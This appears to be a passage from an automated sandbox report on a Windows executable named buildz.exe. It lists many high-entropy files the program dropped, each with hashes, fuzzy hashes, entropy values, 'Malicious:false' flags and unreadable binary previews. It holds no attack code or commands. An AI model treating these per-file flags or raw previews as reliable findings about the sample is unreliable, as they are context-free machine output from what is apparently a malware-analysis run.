                        SHA-512:D2903D1A4708242653C6E697D9B2BBDA60E5BA0F82436F8EF09921BCECE29E7AD8C39933363A2606ABC998CE41EC78636C61A586C6E33A5EADEFFC6161FDB2FF
                        Malicious:false
                        Preview:OKWJN..T..........4.4...E.y.._.v.+ A\..d..<i+.-.?5......]..4...H7...h..0H.../".c.L...+.xL./9.....;g.|4L...IF.[H...E....Z.P+......i......+..J..a....y..ur'..9...M.QQ...T.8...<....2..L....^..x.k....w.....F9.RQOK`..q.*^.... ..G.ai.b.3..A..%M..1i..\.5...<.db...Y......V..FD=....&...m.}.>...Y..L....K..*..."..D..K.h......&`........{..2#.p.........g...+.J?{..%n.`.R.......se..V.0....A....o..7..vro;P.l..w.....L.....?.A...s^.,{....#..z.k.-....rg...].......T..!.a..`..s..N..%..C....P...b3h.s.s.....q.....(......0..(..F.d....v.`.B....._.^7.|..0.S^... \..b.V....$...q.BhP@......(r~{..^.F]O..5..>x ..?b....E.5....N.f9..3.Qe..&..K.i?.2.9m....Xm 4.0......Y.n....~.......X,..i..h._<....#.=.(.|.Ow[_cI...~%Z....(....W.+.I..!gb$w.[=....EV.!c.Vn.....?.n....@.[.....9~.0x....1K9.\Y[f....A..'GTLJ..ah..F...v....%.,.[...C.P..@....T..).c.r..\C."o.........+.y..Vq...9...r..4.O....t....C..G.d.Q2.e..s%.q...z8;......DvD..L...n....!.......f......6.. ..F(.._.~Iu1.#...R4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.85521651545688
                        Encrypted:false
                        SSDEEP:24:h8lcGspBwAM+PtwugnsfgFM2i0d4dg1loMT+9ESc3tJaGbD:hdgse6gNtf1l5TVzJaUD
                        MD5:324D866700B9D240EEC614A05B587396
                        SHA1:A14D5BBE0812EAC70BC6259D9A1299F0A712B849
                        SHA-256:54E2BA3E59044BA9EDEBF70742812B905426151868F47E3CB4138610E8C2870D
                        SHA-512:4756F133E2ECDE04FCCA1ECEAAAA0DC2E6B16721320C76AD947444C86A62A58AFEA0450EECBC5E65F3B360DCA6D0F7E667A3A6424CAD536ECC2BB45BACDEEF9B
                        Malicious:false
                        Preview:OVWVV.....h..8..t.)..%E3.;..L>."...b...x..u.Ld.[.)...!.t..u.....Hx.w...0W$OL[.O$?....r..vS..i.......1.R......iy.j.....'ad....a$k{h..........<.>..'....9q'c.z.5..W.x.Zz.....Wc...*......^q.,.....,..I.:Y/....4...O$..&`!M.P,...4.wkG.7q.....WF.....u......s._.B.Y.i....h...(..wM........0...$?....i..!u._.o...BZ;.hc...R..w.d.....JZ....t..V..9&`()o)...A..txG~=Nr...3....k.._. .V...@O..+...J."$6.'..'.Q..c.<..<...;`VD..lh.T.1.N...U.6d...-...t,.......dRa..kp.."......A....t....A..*.AEf...|...s(@..E..;%k..cK".U.,.PHHm..}.NS........@...$..y.u)..,...c...z..p{.9x..R..U.|F....(v._r....*.A.....qI.P....nJ....._..*......G.....?.4..[./O."b...a..k../...E.....s....;.2.{...N.;.;/^'...).......#P.^P..Y....(U...P.....}.C8..9..3....0...._...\.$8.........p'.\..L.(...3.....R'p"..:.%n.{R.x...]..,.!.E.uI...8.Y...X..`.5.YA.J.G.......N.c..?.q4....K.r.k.wk@[...m#.l..-B.=q]...5.......l.B..Vh..m....Lz.*.j.(.`.b3.2.b... ..B$.!MP.fy.3)....w~...T=.*...^[..k..R.i.X..........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844315068233303
                        Encrypted:false
                        SSDEEP:24:jWj1vkjeWOQQJ1EO2COwCizWNjwLRJnOgYCY9fYi0gvGbD:jWhQQJ10wDY6JnOrpt0MUD
                        MD5:3F53400EDD055A0457607E657FF5D1A5
                        SHA1:83FD9CD16705A1A53F65D48ED80C726F1B1973E7
                        SHA-256:947335B51FAB6AF5D249117A7393268EC6928DE75D6BF00D7E2A927F71C72DF4
                        SHA-512:FD60DE86E32C023AF4425A96D51BCA1D62C3CE39DD9486F734587B18F7DBB3CEB377E13C081A9990E37574F2B6F7241EBB0DF032CCB045E11E2A1326B71AB135
                        Malicious:false
                        Preview:PALRG....l...I@.]..}.....S.'{.t.&C-...8......OF.R[.A../.Hi....x..&F..D..j<..y~/% ...4..N...$../.f.<...X.... n..B....~..P9...c.....&...(...)....Y.Y7.]..x.........b~..7c......,.A..5....{.0..+.Y...=,.$_....j+@...=c.D.....'*...[0......,....B..m..rq.<b^.G.......3..o<".?;...B.!...'...n.G.0.!."n.j.+..:X;|2....n-.wQ.IQ-.....q.........`.[ht...."....Z..Sd.n....Pi.H.h..u..I$...1J@....-.h.Z.lY..(r'S1.3xo.q.nj...~..;..6.i.%,e. GZ..1.(Tj.K..%=--c.mg..I{...>...8....nA_..b....b.Mo....@.....X.\....&D.}.@.F...(.S\!M.TiQ.....0.zf..z4.&..}...g.. ....j.LI\,.C.{A.4'S...h.OY..D...c..6.0.@d.*..O..{Yk..8.....ha.-.H.g.!........\...+.....].&....+.%.h..U..h...e=+9..4..x..m...._...2...2x..v;A. ..h.RHU.....!@H.r.w<.......D.0WJ....8.._h.P..#..*+.l..<..1.b........y+fdmQ|W#.......4..v.B.in.\ `..b.Q..!..My...P...}O.:i{k...|.!.....N....".jf{...........i.-...7.lt..V.R..2.I..k..e....g.............Y....[.M...q..h..{p..z..T.B...eM..8cO.V..\i..H..W.......O.b...QB.<..~
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.844082891343296
                        Encrypted:false
                        SSDEEP:24:QtDjzgWH4XaKB2g3I88QTcDOT8BaWNKZacVRiHoUOPagujzdhkFo7EGbD:GDYw4XB2g3o4cDhBVNKZTCIUOPVunoF6
                        MD5:9D69007E897E8D6711F0461C9C372ED0
                        SHA1:176D455887843E57AAA5C1A867CE5E36CB829EEE
                        SHA-256:8352B48C4AD643635D2EAB57C4244E733C079436EB49F9AA30AF5ED860770EB3
                        SHA-512:A992C2195C6D4200F8968BA731BF8CDE8FA231547F3C31BC9E90DBA870F38EB32D26EE9AF3F8EEB188D842A7BA55343864ED0833915434DBE1129910183E7156
                        Malicious:false
                        Preview:QCOIL....."_...ha+.r...U...u...P1n!...I1.1...r.Wq......m..%tJ.t.*.mb...d....'.Xd\e..0.a........N....fg.e.=f...@o.3e.$..h...@....V<..7.d.G&.@..T....&.X..q..0.z...E.....iv.....&dN..E.4r)Wj.{..,.e`.~......X...k.[.4.=&W..u~...5.ZG...o0.Zf...vG%....Vc).2..8.`..>.D....1I}...>....M\Q..`..f..\P......B....}\.|`$.D.vM...|.........t.>.q.2.)..2k.Uh|Ob...o.k....hhk#.S6.R.D&..........V....H...3(&. .6.V.V.(.9.R.d.d<.....&..(...O...=.\./nI.$..H..(.2..#R...H....h..k...e..?.i...|.w.......~.(S..h......x.CJ...3..S.........z...._../."....Ox..l..8........N1............W.....~..kS.s......)..9..'.M.Yv.hw.Q....l....D.4)..A1....T. .-.-...'.[..QVq...._..x..&...t.5&.qR..W....@1A..?..7}.r[...........n.0...<.."; M.....w._nCY.C+..*......G.g......8.[..4H..xX.2.T.4......5)......$.>..........q...5..n!..gs.>x....%.k.....ng...&..nV...U&.d\...._Zs....A.9;.,J......Vr........P.u...r0<.m..2.Bd.u..d..L..g...}l<....a....zt...g$..9.E.8.W%.J...M...4..U.1wck.W.3.=.s)..c.$..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8281734652592405
                        Encrypted:false
                        SSDEEP:24:wTiIZ2FtDBHImvtgE9FbZ7ZXMhby5E01xftGsEaZ6VHGbD:wOIUrZIQgEbZ7ZXMheG0PftGDaZ6VHUD
                        MD5:6AB9DAB922198B2CFBCB1B0047EF40AA
                        SHA1:D098F2D9D2D50A576133812635EB5FC757631B4A
                        SHA-256:9F5DEAE071D78FD7EB2652D76804F23146CB94030E4EE18C1E5DD59D42029DF8
                        SHA-512:4BBA7CD13DA3B479AE52A10A31F91AC8ACA88FE05126646C88673360B6645B9BBF323EC8FBDEE4DAC3E664C63F8D6814CE8960F75FE553370E1375B23806889C
                        Malicious:false
                        Preview:TWGTY..~y^.eI....+sn.....EL.-.:..8<_.........,.....5!.....a...O..{...dcP..L;X4VUBH.`....o.......r.3:..'*.7U.#..8V..I......."].......Nw.k...,.$s.S..E...9...f....G..o.......`......h(..........2X4.....q.(!.*.w.e?...`.+LAs.@~.....<1v..`W.....1o.!......!.P..hJ.F..zAr...n.....O....<.,..i.s.o.j....Y....P49....^.!..!...v.....=......D...X~].G`o...':.7....;....f..O.3..J!T.qy.Z.[.....xqH.(..%._.B.2Q.Z...A.y. ;l.N.....fP7c..4X.t...s&ON..aeMw....F.G.]z.SlR.....w.../EYp..*9..1.)..w".......[.9.....W...........;.h.......W2-..e..-...y.. ..e...@...*......q...k...........1....u..hO|n&.t.. ..W....R2..U....%{-..R..uCl.k.[......v.{ r..'..:1.I[.[.......2.@.#/R.|Ds..X..2x..c....DN........G.Vs...Q/.82.k].a~T.m.</.ux..Rf.bT.R..>.......N).|3.'... V....P..5C"....A....2..dY..xu..dB1....U8.c8{.Fr..L0..N.....G...T..@D_....)V.n..x.0.....2.c.S...7...TwT.H...,+.,*...=<S.......2.2eZ..{.......C..R .....|....p....q}-.6.K.`.!Z..cBy.w..|.3.)......B....R.Iwg
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.83686360024511
                        Encrypted:false
                        SSDEEP:24:5fwLPRUH3hsiPuJMwst/zyKHa+wov8WS7+hjPwraGG6mw80EzYeRuGbD:kRgsFiZtVaCvugjwaGcw0VRuUD
                        MD5:A1CA6428B9FD0DA0B80738E707CC6A80
                        SHA1:544D96FB9CF9F0FBCA21B0D13EF3D5F59D54D078
                        SHA-256:69498D524F72F50506A708069F148F2EF719B85A37BBD75994482056E110F1AD
                        SHA-512:9DAE2ABAF6B056448986B392F7A1FB791CBB52878AE059551F05E1DCDFE1CBC069387283FDEC27F522246C7A3980C992EE2FEE52E188BA71E0A387A9C708B9F7
                        Malicious:false
                        Preview:TWGTYPQ...?#........x3..W..1...w*F.....diV....Xm..*.._y.....w.'...|.W......E_f.Q..2y9.9,..d..V6...L=9@2..?g\1..-IqdH&D6...O.F..!.6.*.9W.D.n.....Q.n`..Q.*.bl.5.@U..JO....q....1J.&...&.E.2..O.]d....5.F......-..cB....@..aV....W.n.Z!I>..-..m..}.o...u_2..B....7.e...s.h.o.(V.]_.]$g...^....x....8:.._..m..,$~z...*b/.o.xr..d...c|.1Y.....&j.S+Q....3.KC_3..o.....4.|..5r.D....(.L...'...6......t...}..y..8c...j...V....14@.......;....=..@..#B...f.yu.z]2P.>2?;..<...ht.......r...r.~.....:..>.......wB......Z..w,..Y..Bx..........I..y..VJbD...L.F..8.EE.H.5............qBD...a.Y8.w6..#.z.L..!.r)M:...B. .>W.,m.V~..+....T."^....Y../...M....G.@N$@.Q.q.wJ...,.......=K..J....F..........n*.R.N.,..@5...-.2Jr=..%.Fs'X..+..tV-..A...Aq4.c.S.^}&".<D..w\.+..-.-c..G.. &)...F.....%j....1.C.....{|X.7...>...Lfe.l.Q.C6O3q..|.7.t..).&..2...<..<e..C{.."....+.=.0..L.A....$.........J$..]...oP!..._..>%.n.9..,.M..%w..#..f0.J....|a.m.J......|....L....d...8....._..z..V...x$.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8597304442429445
                        Encrypted:false
                        SSDEEP:24:nm/JcxMZiEHyGdO7mozU7KUQm9lPBSdUKMxAARHhmieWBRSjQbtOnh8nO+GbD:nYSmiE1ICIU7KJmtmArTvaQbEh8O+UD
                        MD5:622A3C2F7324B35BB60942E3607A641E
                        SHA1:734469B9BBE56BC1304E295215251F27BD7B9224
                        SHA-256:7F73DCD2E16EBF7880350AA912DA040A7C235E726EBBE6A8C2D434F2013629EB
                        SHA-512:4FE39CB3FBA5510886C10E9C9A67C9E3988B4CDBF9682A388A455F6E2246363EC7C09C2FE1EF863DD4E3B97CE9480980DD3840E5FCA8E80E76A29E2A4D8EAE93
                        Malicious:false
                        Preview:TWGTY../.........tr...'.c...^....$.g.WP.,...E7O...-..@Y5<.YX.4.@..8.....F.T..|.w.......A.-i....QE...0N]..V.68..........V..B+.T...?.v.|%.qH.;..V|.7{5/...J....qw.@b.u........h.....8.....b.......]....D...^....X.CQ.pt.C._..A.'.QX?.B5-....D.Y.'(..8>...{..I.(.JG<...z.......:[X...H^.W.3...1...k..c...y.H`.9.,.8......$......5.(.Vc...y...![....2.g..%j...Z.!;o......Ow..,..d.g.....c..`.;...>.3..u.....;S..c.....,6.|..W..I.^=..t..1,M.VJ....9.....3.....B. .m}M.....B5.z..1.M.}.2)...$.Tn.....".2.(..6...../..y..,...+.`..$...e.I;:..7........B\/U<... 6.r.%n.....8......{k.jQ.*...$...a.R.;n.+^;^B.Pp.g'%f....0N.`.)*........p.6*s!`riM..y..; oT..&...Z.t..G!Y......9b.J..e.1..9.V...HI]..t-....;.W&.]..U}.....tY.~0{.c...N....R.G..[.....z........Q.{.'..Yp3x..N..4..t."...Qz...).......G.....<.b.W....^.....w.$...k.b..+Y...]..A.;...5R...a.oQ].@..k.......o&z..A.H?,...9...^..........V.n.S;.6VR".7.......T^3..n..j..zY......1>.<5...pF..Qj~...X...`,.>m
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.856573184236071
                        Encrypted:false
                        SSDEEP:24:tCtEeS2UEVD0+mODodZhBhffgezwMlf/Dj/bN9XmkxThuGuxaGfGbD:8OH2UWD0Food7geka/D3rXdlucCUD
                        MD5:30DBF7BB1D06576D4661E88E26C526D4
                        SHA1:F5F0B6EAB9CFD6F1C249852F45FFFEC87E62CD8E
                        SHA-256:C92A90AC8C6A903465A6C79CD8ACDDCA2C817DE372AA023B2ED521E0FB9B48EB
                        SHA-512:CFF29B4C9369826D2610EF9B2B6A1EB5D2554E165EC03EFA6050684E8FF903496161EF1C5B862F1805A33DA3AAA2547B131AC1595AF11EDFB5E67D1B664DCAC7
                        Malicious:false
                        Preview:TZKYX.(......5.....&:o.......f.......k..O.Y.......0[v.`../....!.o9...].....!r.f..t.$G.:#.......@.!...6.....6L.I.........[&.._j0.*....~T,.&...........gX.....k.43)N.....Q.W.....i..^U`.v.mS..PD<9....`P.......>\...E<.Z..>o.....s5iB..8. ..c....~..O.bf.\.}V........B..d.a..U....*.Wp.N.../Tf8#....!...T......>`.i...T.0..Gt..I....}n...=.X.3SK.d..v.. c.a.#.....r...._P.'...?,'.E.......>.).....F.H.2N.@..q.Q..v...I...5L.@X...]...f..9..;A..*,....){.....A'.`a...|..}..s.!i..F......L.x..=2.'..s.......$0...C.U...@..2`.[f.f...hK.#$.JC..D.j...~......7.!I..;+.}f3i.p%gJ*..M..F.5h-.YM0VZ.j5/&U........X.'fJ....;.;l......4.......~....?v.>..C..B..............\.....n,C..C..n.....5.....:...fk..]I....7>E.Z....L.\...o...T4tz......k.Y:.^....kY4Z.....w|..)~ .....\j...&....p.kD.g...pF./~......^.x.f..e....%...=...........o."*u.P.s...i.w.J.*(^....X%z0?.Kf\..Y<R.X{6.....Ur~N. .....~h.!..I..uK']f<.T.....y, ....EJ.....I.....(v..ZJN.F+.~.%..&I...9I..x.ty=..BP..\...3h.JT.bP.j
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.834028828755596
                        Encrypted:false
                        SSDEEP:24:AFXbt9DAB+1Hqo8vcN/2YMuKU+EmrxmBgwr9bYjRoSl6/MhhEHIrkaoTdZFEu/Gg:Att9cY1Ks/1Mu9cxazCjRoSl1hyhao/p
                        MD5:65557480E50A19EB5522ACF04C7D61FE
                        SHA1:8BB366E8227AEB9E56A644BD83BBE10F2EABC54B
                        SHA-256:E410F0029ED1267349A2689E5C295B8E0B7B3597664658C13029E619B4D918C4
                        SHA-512:B96CC586398BAC9BA7B29D9034D43629FEF9D6C7F0F906B003F895517936099FEA262C477E1FDBE5541AE02386958BB611B3B5DD787CF867EB40526B3E3ED7EB
                        Malicious:false
                        Preview:UFTNOl'....W.$.A..........G..3..3...i...R4.3.1..F...<.a.....@....|nr.....P....L.n....R.2...u..........1.O.....|.kC../Q\x|...^....m7,i.C."...H..!.. .;6OZEw.`..t....}..8..q.L/O.u....'..p..8.m.4...M$...>...H..2..x.d.6;....%...&%..v.....a...+....2jp=...lb...Uw....p.fi.c..j.....;.:f...+.R6..#N_..4........1.."f....\/...XN....R.....V..zq.~n.of.......^..rL...D..&.(./#,.6..t....X..x.7+..N2'-..U...'.l9..9..r..0A...].....F.@..C....&`{Y..hh.y..S...`..U!.)..`u.T.h.....w[.. .?1.!6.O{...G@.+...(......4.......a............ztQ.p79..P.s...F?....w.:O.k`.P..d.b.f.../{...."=.N(?..`u#...R.A......j....~U..J.........Q/.*>..K.#.1..[v..pF..7..ZrE..y. .b..u@.~.5.S.c.R.^.TS.!.....E...S(U.a...8%Wr.B.:..hF....)M.[;.4.?.;.D.{.LE.6?.).MB.r.....C........N..).kT...-..7...x.......1.'F........U.. s..&......!&.f.D...b..d...NCW....f.y3.I..K...Te..D..#%...7.X.3q..\]1..W...D...c..\n.;)..dZ.0S...N...).}U.2..Z........\]...i.q..3.`..n..s.l...p`..a.2MWI....@.[q........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.845056545497165
                        Encrypted:false
                        SSDEEP:24:BKoH7wQEwv+fQGhPjig3c76NP+KGBcvmE7rBD6nATELz/3RNGbD:d7wQEwGMuc7wGKkGhdTMXUD
                        MD5:C54C76B21179B2AF102F85406FF2FCFF
                        SHA1:616C44CE6D100D82747A42FD732065CC00E72FAD
                        SHA-256:5995221C02DA202778B328494C7A6D1F0896B18FD8B6E621B89C2ADFA4093BEC
                        SHA-512:6C9D0D1058E7879578824B7EA20BE80A0063AA452D55FF43D92D2DC10786C26F6B1EC118EA8EF6B22A147693833663E1D5A6216D9D29DB5A1F68A1556E79A3AB
                        Malicious:false
                        Preview:WSHEJo.%G..V_Jam....8.{...9]...`:IX...6q.r.~.p.@..|}L.7K..(..;G."..t,..=..vA.aJ..T^l.C./..x........j'6F.<...W..........$E.E...j..8-...&....#..V.[..~.OP.....u./.q?.(.K..(.sfj]'V..y..a..y.!...9.:.S..r..%..0..F?...v.%.z4.8e....l......[...0N.8..w.j.p....UT.-..>....|....6.F......1uq..(.o..%.......(J'..`.....mhl.3....&.4.|...rv.C|.(^(......e=vj.z.<.Gd...z.W.y.E.{l.W.t.C9..H#...-...A...Q."d...I.\.....].;_.4J.\.v....D..Sj..Gy..E..U..D......l).[;...k..9...,.0.u}.6...a..{d7"..pD.u.."F.z.....Sl.3.)7T....>.....5M.U.D.....\eO....l.....'*..E)..Y.. ...=Y.22.Z.V......h4......\.!*.{Ov..N..w..'n.~....Q.sE:)...:....]bx.\...k..m..G..Z..q..T.K...l..+D..\.7...G.6Q.v.!.gX.u...1.-qM..c.. 0..D..X...]]....._^.tfy~)|B......nw...B..a.0z".YJ...I....}D..9.....g....U..!.C&G..}e..s..,}&....b.9.t...S.8....|.UK...cz..UH...y.W.............,9z}4H..;....j......#yG.t...B..*....T..;...@..U.c...U..a5...1W.e......t.W...2.!....{..D4....N....h4.....O5....MP..|5......f*T1gq...f4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.848155544047657
                        Encrypted:false
                        SSDEEP:24:jfDALM075sk7ou6ZNYMMic7KrKDPF1J+K3LlE/q6ldFqxQPolqgHGbD:wLPVZ7ouANJMI+Dd18YlQln5PolRHUD
                        MD5:85172EDD12EA0C1941917D50C636BB5E
                        SHA1:4267D4018D82DBCBB3E15B6576AA36C373EB276A
                        SHA-256:516B73AA43741D21A2095B4EC5A42FD19350AF79E15F61164E3C02BF03BBFFD5
                        SHA-512:56FC6F4070C28CFBDAE65C1DFECC96FEC9B52682500DBE3154DF851374815DB5AA960904CEF6ED8976FA638812C109A764A18CC2F81BF6113862522A1C06A21D
                        Malicious:false
                        Preview:WSHEJ1.H.......;....R/W.f.V.........a..!N.!..$.x...8...aG....+.D..,.`.b.M@.a...&.G.^W[..Gt...(.x...a9f69.JlP.[s....z&....E.|..\..N"..h..Q.....2..+.M.>p...(....Z.:...R.Q.....j(Q...E.2.q..%..z.J....p...*t.{.{.(.....%..".N.f.W.8.-.._N\y.Rj.9.....m..s...#'s.......>..v.c$Y...H.>u....../.@.v0.).4......a...`..A.z.j..U.s......x.....#....Q...........p).[...O.......th|?...z.......JL....."..ks).FmOi$.q.N..%.Hp.u&..}.......V.[..Y[....,tRz.Q.yOKgs.y.e3Wsq'Af..*.({..5_n.X.*{.8t..u.?.u.er.........6#..8..[..+....]z.0d..$....~lA...M.4%A.....X.Xr..'4D==:......n%z.,........*...t.G.......W.=...?.y.7.....z.:...2...0W53..W..%N......Hm.|c.u....=| +..x=.o............=..b..N......j...PI|..b...r9(..............f.@...P+.GL.9.....@Z{3....,..61..+.U.Kui).e..../.....E.`....iI1....iY.(...+...=(%.J..H.5.T.&...F+...Q60..r5........._p......!....:0$.&..@gK.......?..|..&.P&haF.;XD;.*.n#.U.&h.....N..{.*..m^...:Q,".E..........|.;{.%Os..rR+.^......|;+...7..W~.3C...=...._,]5M
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.830338993184211
                        Encrypted:false
                        SSDEEP:24:+l5w6HeVMlsht2a0dK6pKOWR14v29rXu6cvkvkTVT+az9NOP7lVuQL7yPt681OGX:+l5wX2AtEK687O21hvksazezvue7w1OA
                        MD5:8C697D8DD8C17CE5A431463A9C95B2A8
                        SHA1:C0A98254428EEF584BDD963945B49820CAE602D7
                        SHA-256:6BF1A715E3A8B0AA2452250F85BB0C8663CBCAA582C31E0140A4529C5D65362B
                        SHA-512:9A9F299E1F47D7ECEF203D68B2241DDB3C7176BA98C7B18682518545C309DDBB8B909B72054E97C20F08D76001E543F406E8AD0DC8331B05711115466286FDD0
                        Malicious:false
                        Preview:XIDWCn...Q....~...s....:v%.`.G..../..".....Z. .Q^..G.|.........B!]P!....@E...u.`.)u......(......;.7..}..5q.......5...a.......[Jgj...e-.V,.j.~........dI&...Fkh.1_f.@l.k./...n._8...)....~,...`.Ad...C....=...*w"Fi..|*.s........YBu...........M.8.T.#,.z..l..P...........M:....................w.e.(..HD..4.h...]Jr....|E.x@.....#..D...E._....\C.......<.r....<tv...+.z.%.Y.C..qx..Y.xn.z.x/O...U-.l4.....+P..-.<c..,.0R....{G..T.."..q_.{.rF.e....1M..!......c.B..Q.r..0...E..W..........H<...f..)Qo...;[....\..<..F..s.TZ#..J.4.Gv.......e>}\...LSf.P&..b!...].8Na..O........L..J+>.G....S...:......[.)0...\.!..7f.xh.cQ.D8.:..Oq.dz...........{q.6}.N....c..p.V0...dj1ka.f..q.D.O<.J.09...G..,c.B.z.q%....0....T.\?Hd..50.....W...aj.!...P.4E.[#....U....v.>....,.u...8.%...E..Q_...h.E......D....Sa..HK oz.WyF...p.....;8...u.<..(...O.+.T...&....A..T.b.?...3.)&d....R.}l.G@.;L|b>Q...BY6d..(:N\.w.kX........`.t.V..i..).;..s.MU..fl.]v3.R1...."p-.....7..K..;.+....ecN..nF...1
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.83569657426654
                        Encrypted:false
                        SSDEEP:24:8D+SrI5yhhhEOUgJF2FSyEsNckhc5ILAKQh/t6ljW6icYvWbFl4vqyTvHGbD:8D+yw4XEBgJFsvNckDLOR6izCmCyTvHA
                        MD5:50067E4BF527508F6CA752BA499521AB
                        SHA1:2883D316F3A270841B358C94B9041D05B3B9ACB9
                        SHA-256:1BD2AA4F32E40BD36FA809F4C93DCCE811049E67AB1844642C517DA8CDE2A20F
                        SHA-512:AA896FBBED7FF6D83542B4A178C127DABF3A5032D1FB4BB6C3B5AA016668492B3C462E8EE0BE2A76F4D729F76FA0765FD68A2CBE186DD3F5310B00E750FAAEF5
                        Malicious:false
                        Preview:ZGGKN..|8........L...|(W....S....0.....NZ[../e.V.SPB..I........J.'(..=...Z&...i.].....6.3Hahc.....a..r...j.a.....gRCq..?r...s.c3C.ffn....CZ\..v..9.Lsh.EDN.7.>9]..".6y..=-...B..9.-tCa/.H.3..Z...aNQ..c....cLc..0.@&....l..8.]nX.]....l..\.....x1o.....a..Q/.^4..Z...hB..riG..{...........$...l..p.EU.c....u9]3L...%...!...Y...z ....=FXb+j}].)0..,cx..c..._..&...W\&%.gc..Q.cD.....`*...v.....TD.....wG@.^.-v`i'.....e.9.....Z.@[....&)k..+J&........x7.}.......}...S.i.Z..pp..L..kp.P1.J..!..kg.m..#a.....']....e.F.s..&Aq.N..=.6.5.j. m.._l'..,.ZM......lS.....'......Y..u.'...x.,.../.{....j...).Y?K.-.K...`r...3..$.2..ol%.Iy..,.;.d?)c{....:.......Q..+G3..}.".K.s(..!..p.b..DjZ.c..j._...Q...-....}.....vlsx.*.<.......^....!..tD..1.;.^.a..C...".g.F.....6.b..@..6&..0u.H....I.o..o...*@q..T..xz.....T7<5<.j...c.C[.9....2.u.. [vI.H=.9G.'.JY0...(8..3X..b..FNC........+.]..$.eM7..a.. D.].:A,T..G.'(....u=..U,..7F...6.E....[.T.........^e.T.+.Y}.7N....4.....~...Y.-...x,yE..PX..w
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.8249379824326875
                        Encrypted:false
                        SSDEEP:24:7gqbVVvcNBwKbX6ZTCeBqk9o94SYjEyBD3WQii25JOf8/igX1SJWhV3ux1watfGX:7gskyKz6ZTCeBjnzx34XOk/9X4JWz3uy
                        MD5:7647F206D02C998870162E6B483BF807
                        SHA1:837160B1FC26BAE6E8083BA67251D70601804B89
                        SHA-256:3671C2EEE71AFF0550D8FA94F6FCA8C766AC5F278083464A2B053BF70015C97F
                        SHA-512:DDB0691C65EAA2C6A7ADC304D486A830E28F812F66020A6643AEB8B9B5388B646D3478DBB77AFB6C73F4C735C516DB0E8F28D1BEA2CFB3778F4C853FFD4F8246
                        Malicious:false
                        Preview:ZGGKN&...Q..R.x.....wZU...4/.....Gj;.$.JW9V.Q....y..z.62.!..X...|1.[..!.x.XZ.4n....vW.z.A.......e..XF.e...c.S.?.............IqI..g$G.....\|?`.-),.(...a:Y.S..^?*....<(..H.i..1....Q5..T..Gc(.@..x....C..../y..6..b..c...[........ .....>B.M.....v..YW..yY..Z2.O...z...;.=.5.#.H.A.x.9R.a..2Gq.....(..(.....b.[D..:P.$..$..C..p..>#<.-,.vo.J.BaH~..^..Q.Z..H.6.X.?..Z.e{.td..x..;..P...tFo._......A....[..-.).H\8.k.....r/.+s.vvC.an;R.2.BEsTfU...?0.+;.3n-8...yD.nZ.X.*:.....&v......z$.9...J...Y....\..C$..H..F'Z..Y{."K..\......'._.......K@..7"....T.\^D..=.O...cER...f...s.V...Y.n..B%..XAa.mw...V:Sj.xzk..G-./C...M.xO......?ozO..rG.ujX...n..of<......d.....Tn.Q.8.....`]..OK....y.qh..hZEu.4..G...f.;p.v.g"@...G..VE.3.P.O....<^...J.B..}...>c..8.Q.......sq..Q..Z....81m.x...A.......5.w..+..wBm.....%.........v6L.|.4...m.../.b..pC...........6U../^. ..1R.......O ....i;3s....<.....{Q>t..pH..%%*1wO.v.;....<...um..1K.y.)..S.c....8..!Y..'..6...`.SB1..>.O....-...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4120
                        Entropy (8bit):7.948807857998898
                        Encrypted:false
                        SSDEEP:96:nbIE0JKbAMk/vEIsR1ciQnedPfvSeUrxyxXF6gQQA:bIZv/vEIk1ciQnWHqnxyn3A
                        MD5:D59B04C3C87F2EBFCDE344DEFEC46A66
                        SHA1:7D97EAAE0FDFECBCB98B515ED7B633F14DDB416D
                        SHA-256:A0AF2CC6FF8435F9C4DDEF6B9992DC09C9BA11E0CA631A14A589DE81C36FACC7
                        SHA-512:367DE1573C114C2AFCC1661EFE20E6A2A7689D6B58B5D2C7700685F1DBE7074050372F1FACE5FAF3682CFACE5529316C4EB8A21661F4D1216FC03816CB9DB9FA
                        Malicious:false
